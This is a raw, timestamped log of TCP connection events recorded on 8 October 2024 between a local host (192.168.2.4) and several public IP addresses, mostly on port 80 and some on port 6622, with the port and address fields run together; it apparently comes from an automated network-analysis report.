                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.117032051 CEST804986454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.117117882 CEST4986480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.117265940 CEST4986480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.117571115 CEST4986480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.122378111 CEST804986454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.122391939 CEST804986454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.153779030 CEST804985834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.154011011 CEST4985880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.154232979 CEST804985834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.154304028 CEST4985880192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.159097910 CEST804985834.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.321316957 CEST4986780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.327187061 CEST804986718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.327248096 CEST4986780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.329600096 CEST4986780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.329854965 CEST4986780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.334878922 CEST804986718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.335016966 CEST804986718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.395374060 CEST498716622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.400557995 CEST662249871204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.400643110 CEST498716622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.404474974 CEST498716622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.409322977 CEST662249871204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.805532932 CEST804986718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.805792093 CEST4986780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.806015968 CEST804986718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.806071997 CEST4986780192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.810543060 CEST804986718.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.863157988 CEST804986454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.863244057 CEST804986454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.863341093 CEST4986480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.863373995 CEST4986480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.868264914 CEST804986454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.999995947 CEST4987280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.004941940 CEST804987235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.006542921 CEST4987280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.007145882 CEST4987280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.007164955 CEST4987280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.012242079 CEST804987235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.012269974 CEST804987235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.231379986 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.236485004 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.236576080 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.236701965 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.236725092 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.241640091 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.242049932 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.657612085 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.658593893 CEST804987235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.658607006 CEST804987235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.658615112 CEST804987235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.658651114 CEST4987280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.658678055 CEST4987280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.658719063 CEST4987280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.659558058 CEST662249871204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660530090 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660540104 CEST804987235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660559893 CEST662249871204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660615921 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660635948 CEST4987280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660648108 CEST498716622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660648108 CEST498716622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660782099 CEST498716622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.661571980 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.661595106 CEST662249871204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.661618948 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.661637068 CEST498716622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.662575960 CEST804987235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.662606001 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.662652969 CEST4987280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.662656069 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.668726921 CEST804987235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.668731928 CEST662249871204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.811058044 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.811090946 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.811845064 CEST4988380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.816410065 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.816701889 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.817208052 CEST80498833.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.817286015 CEST4988380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.817447901 CEST4988380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.817636967 CEST4988380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.823070049 CEST80498833.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.823837996 CEST80498833.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.929364920 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.973171949 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.279866934 CEST4988580192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.285100937 CEST804988513.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.285162926 CEST4988580192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.285326958 CEST4988580192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.285342932 CEST4988580192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.290343046 CEST804988513.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.290783882 CEST804988513.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.294512033 CEST80498833.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.295233011 CEST80498833.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.295315981 CEST4988380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.295341969 CEST4988380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.300193071 CEST80498833.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.386236906 CEST4988680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.391236067 CEST8049886165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.391318083 CEST4988680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.392247915 CEST4988680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.392313004 CEST4988680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.397561073 CEST8049886165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.397798061 CEST8049886165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.677037001 CEST498916622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.681808949 CEST662249891204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.681900024 CEST498916622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.685882092 CEST498916622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.690661907 CEST662249891204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.117394924 CEST8049886165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.160693884 CEST4988680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.167762995 CEST4988680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.167799950 CEST4988680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.172821999 CEST8049886165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.173053026 CEST8049886165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.403785944 CEST8049886165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.457544088 CEST4988680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.610193968 CEST804988513.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.610375881 CEST4988580192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.610508919 CEST804988513.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.610780954 CEST4988580192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.615183115 CEST804988513.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.708779097 CEST4989880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.713720083 CEST804989854.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.714023113 CEST4989880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.714023113 CEST4989880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.714023113 CEST4989880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.718811035 CEST804989854.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.719109058 CEST804989854.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.135163069 CEST4990380192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.317887068 CEST662249891204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.318017960 CEST498916622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.318018913 CEST498916622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.318780899 CEST804990344.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.318857908 CEST4990380192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.320051908 CEST4990380192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.320067883 CEST4990380192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.323026896 CEST662249891204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.324883938 CEST804990344.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.324924946 CEST804990344.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.452116013 CEST804989854.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.452589989 CEST804989854.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.452666044 CEST4989880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.453079939 CEST4989880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.457998991 CEST804989854.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.517069101 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.517414093 CEST4990580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.522595882 CEST8049839208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.522650957 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.522677898 CEST8049905208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.522839069 CEST4990580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.522933006 CEST4990580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.522933006 CEST4990580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.527859926 CEST8049905208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.528244972 CEST8049905208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.785618067 CEST804990344.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.786139965 CEST4990380192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.786458015 CEST804990344.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.786557913 CEST4990380192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.791095972 CEST804990344.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.124773026 CEST8049905208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.176697969 CEST4990580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.207379103 CEST4990580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.207379103 CEST4990580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.212348938 CEST8049905208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.212523937 CEST8049905208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.273925066 CEST4991180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.278760910 CEST804991154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.278871059 CEST4991180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.279133081 CEST4991180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.279149055 CEST4991180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.284044981 CEST804991154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.284445047 CEST804991154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.323559999 CEST8049905208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.333106041 CEST499126622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.338294983 CEST662249912204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.338391066 CEST499126622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.344719887 CEST499126622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.349689960 CEST662249912204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.363815069 CEST4990580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.422363043 CEST4991380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.427426100 CEST804991334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.427490950 CEST4991380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.428262949 CEST4991380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.428284883 CEST4991380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.433166981 CEST804991334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.433279037 CEST804991334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.013617992 CEST804991154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.013629913 CEST804991154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.013741016 CEST4991180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.013767004 CEST4991180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.018599987 CEST804991154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.171441078 CEST804991334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.172276020 CEST804991334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.172338963 CEST4991380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.174253941 CEST4991380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.180000067 CEST804991334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.283143044 CEST4991980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.288081884 CEST804991954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.289797068 CEST4991980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.289952993 CEST4991980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.290518999 CEST4991980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.295169115 CEST804991954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.295375109 CEST804991954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.312402964 CEST4992080192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.317401886 CEST804992035.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.317517042 CEST4992080192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.317620993 CEST4992080192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.317643881 CEST4992080192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.322642088 CEST804992035.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.322783947 CEST804992035.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.811377048 CEST662249912204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.811449051 CEST499126622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.811505079 CEST499126622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.816560030 CEST662249912204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.010620117 CEST804991954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.010790110 CEST804991954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.010812998 CEST4991980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.010838985 CEST4991980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.015957117 CEST804991954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.052648067 CEST804992035.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.052865028 CEST4992080192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.052947044 CEST804992035.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.053003073 CEST4992080192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.057744980 CEST804992035.164.78.200192.168.2.4
